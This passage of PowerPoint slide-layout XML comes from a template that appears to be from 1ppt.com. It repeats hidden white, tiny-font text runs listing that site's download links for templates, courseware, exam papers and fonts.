              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout36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36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36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36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37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37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37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37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37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37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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout37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37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37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37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38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38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38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38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38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38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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout38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38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38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38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39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39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39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39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39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39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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
